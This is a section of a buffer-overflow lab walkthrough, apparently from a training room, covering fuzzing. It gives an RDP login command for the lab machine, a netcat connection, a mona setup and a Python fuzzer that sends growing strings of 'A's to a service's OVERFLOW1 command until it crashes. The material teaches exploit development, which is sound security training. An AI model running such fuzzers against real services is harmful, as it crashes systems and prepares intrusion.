2. Fuzzing

Fuzzing

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.213.94

Once we find a vulnerable part with Spiking, we are going to use fuzzing. Fuzzing is to send a bunch of characters to the program to see if we can break it.

On your Kali box, connect to port 1337 on MACHINE_IP using netcat:

nc MACHINE_IP 1337

Mona Configuration

The mona script has been preinstalled, however to make it easier to work with, you should configure a working folder using the following command, which you can run in the command input box at the bottom of the Immunity Debugger window:

!mona config -set workingfolder c:\mona\%p

fuzzer.py

import socket, time, sys

ip = "MACHINE_IP"
port = 1337
timeout = 5

buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        connect = s.connect((ip, port))
        s.recv(1024)
        print("Fuzzing with %s bytes" % len(string))
        s.send("OVERFLOW1 " + string + "\r\n")
        s.recv(1024)
        s.close()
    except:
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)

Run the fuzzer . py script using python: python fuzzer.py

The fuzzer will send increasingly long strings comprised of As (up to 3000). If the fuzzer crashes the server with one of the strings, you should see an error like: "Could not connect to MACHINE_IP:1337". Make a note of the largest number of bytes that were sent.